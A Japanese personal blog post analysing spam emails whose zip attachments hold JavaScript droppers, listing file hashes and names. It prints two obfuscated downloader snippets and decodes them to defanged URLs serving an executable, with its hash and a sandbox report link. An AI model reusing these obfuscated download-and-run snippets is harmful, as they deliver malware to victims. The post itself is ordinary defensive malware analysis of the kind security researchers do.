スパムが急増・・・ForeFrontをすり抜ける?

ども。こんばんは。

最近異様にスパムが来ます。

決まってzipファイルが添付されていて、今んとここんな感じ。

6032eaec1f2bc8e7dd3397752d95e9fa Document 2.zip
747a0958f1a640e69dffb47d8f722d65 Image0812377663977.zip
9c7e61191cd20799409fb0fc7846d647 Image83801387530425.zip
4a7d8aa3770ab633f9f48187d60a9e05 SKMBT_C6626610665883.zip
bf2d74135b470b9009e59c47dd2e4c61 SKMBT_C9590303963783.zip
21d237c9565504b7cc679da9ec93e361 invoice_[メールアドレスっぽい]_316566.zip
e613abec63571b92f76a67bb7f7ad98b scanned_doc_00594679.zip
1d151d97620d7a0aa8922ecdcf4e5331 scanned_doc_09622010.zip
c57c6807da4c057ba33bb41de664b00d statement_[メールアドレスっぽい]_337450.zip
650e3adc5475e2a43ec1ea281825c384 warning_66901940.zip

Fromが自分のアドレスで本文に

Sent from my Sony Xperia™ smartphone

とか書いてあるやつもあった。。。おいらはXperiaは持ってないぞ。。。

ちゃんと全部は調べてないのですが、中身はほとんどJSっぽい。

とりあえず適当に2つくらい解凍後のJSを見ていると両方ともにこんなコードが・・・

その1

screensaver(“h”+”ttp://ww”+”w.”+”gosocial”+”.org”+”/7″+”62″+(“attractive”,”freehold”,”wallow”,”trg22e”)+”2.”+”exe”,”WSnG
AqVdLdb”);

その2

screensaver((“interim”,”sticker”,”awful”,”changelog”,”h”)+(“unfeigned”,”jasper”,”tt”)+(“myrtle”,”happening”,”differ”,”po
lymer”,”p://dev2″)+(“alternative”,”borough”,”minds”,”skype”,”.d”)+”ev.f”+”an”+(“bronchitis”,”partiality”,”defendant”,”au
burn”,”js.com/7″)+(“inlet”,”alloy”,”racial”,”carey”,”62″)+(“discernment”,”spies”,”surely”,”tr”)+(“confusion”,”montana”,”
g2″)+”2e2.exe”

それぞれアクセス先はこうなると思われ。

hxxp://www[.]gosocial.org/762trg22e2.exe
hxxp://dev2[.]dev[.]fanjs[.]com/762trg22e2.exe

「762trg22e2.exe」を落とそうとJQueryのscreensaverでアクセスさせるっぽい。

両方アクセスしてみるとファイルはありましたね。ハッシュも同じですね。

38c9364d25d3893cef68e1c301895c6f  762trg22e2.exe

動的解析結果
https://malwr.com/analysis/M2ZmNWJkODNjYWNlNGJlYzk1ZDBhMDQyNjc3YTU4Yzc/

こいつ何するんだろう?
ちな、Nroton先生では引っかかりませぬ。というかまだ何処のベンダーでも引っかからないっぽい。

 

うーん。残りのやつも調べてもおんなじ感じがするなー。

それにしてもForefronで止まらないってなんでだろう・・・。

てかこのメールが着始めたメールアドレスあんまり外に出してないのになー。腹立つなー。

ではでは。またの機会に。

 

 

コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください